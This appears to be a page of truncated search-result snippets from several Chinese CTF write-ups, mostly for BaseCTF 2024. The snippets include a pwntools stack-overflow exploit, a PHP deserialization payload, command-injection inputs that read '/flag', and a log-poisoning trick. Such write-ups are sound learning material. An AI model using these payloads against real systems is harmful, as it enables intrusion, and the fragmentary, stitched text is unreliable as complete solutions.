BaseCTF{7E9328AF-784C-8AF5-AC10-D6A8FC0977A8} pwn 我把她丢了 64位。 存在栈溢出。 有system。 有/bin/sh,鉴定为模板题。 from pwn import* host = remote("challenge.basectf.fun",34817) sh = 0x402008 sys = 0x401080 rdi = 0x401196 ret = 0x40101a payload = b'A'*112 + b'B'...
from pwn import * import struct import math # 定义MD5所需的常量 T = [int(4294967296 * abs(math.sin(i + 1))) & 0xFFFFFFFF for i in range(64)] # 定义左旋转函数 def left_rotate(x, c): return (x << c) | (x >> (32 - c)) # 定义MD5主循环所需的四个基本函数 def F(x,...
BaseCTF新生赛web week2解题wp [Week2] ez_ser 这是一道反序列化的入门题目 只要自己了解一下序列化即可做出来 payload:O:3:"web":2:{s:2:"kw";O:2:"re":1:{s:4:"chu0";O:3:"pwn":2:{s:4:"dusk";s:4:"gods";s:4:"over";O:4:"Misc":2:{s:7:"nothing";N;s:4:"flag";N;}...
[BaseCTF2024]sudopacman个人Writeup(包含部分Crypto与Pwn) - 个人主页 (cryingn.github.io) Week4(crypto) hard_math 相比前面几题, hard_math可以算是一道相对来说比较正式的题目了, 其实一路下来做过ez_math, mid_math和mid_math2的话可以发现我给的题目应该都是循序渐进的, 只要顺着知识点进行学习, 再...
2024BaseCTF-week1wp web HTTP 是什么呀 根据提示写出相应的数据 跳转了网页,但没有flag,BP抓哥包 出现了base64的编码 解码 喵喵喵´•ﻌ•` 命令执行 ?DT=system('ls /'); 看到有flag 直接读取flag ?DT=system('cat /flag'); BaseCTF{8eb2a1c2-7de7-437b-bc16-fc3d783b797c}...
DDCTF2019-WP-wireshark winhex修改的图片能进行解密 中间一长串是16进制编码(最后一个是7D,在ascii中为‘}’字符),进行base16解码,https://www.qqxiuzi.cn...信息多是隐藏在HTTP的url,html或者图片里面),直接过滤 可以看到流量中存在png包,分析整个HTTP流中存在3张图片的下载,并且如上图所示在第一个请求中...
BaseCTF-web-wp BaseCTF-web [Week2] ez_ser 源代码+poc <?phphighlight_file(__FILE__);error_reporting(0);classre{public$chu0;publicfunction__toString(){if(!isset($this->chu0)){return"I can not believes!"; }$this->chu0->$nononono;#3 chu0=new pwn()}...
这个没做出来,看WP了解到可以利用日志文件,并配合UA头内容实现命令执行(用BP!戒Hackbar!)。具体实现如下: 玩原神玩的 <?php highlight_file(__FILE__); error_reporting(0); include 'flag.php'; if (sizeof($_POST['len']) == sizeof($array)) { ys_open($_GET['tip']); } else { die("...
BaseCTF2024-week2-Crypto部分题目wp 先放一下官方的wp(我这里只放我出的题): https://j0zr0js7k7j.feishu.cn/wiki/JQbiwKdvtiR49VkMj5RcmPvPn7c random_primes fromCrypto.Util.numberimport* importrandom defgen_n(): primes=[getPrime(128)for_inrange(256)]...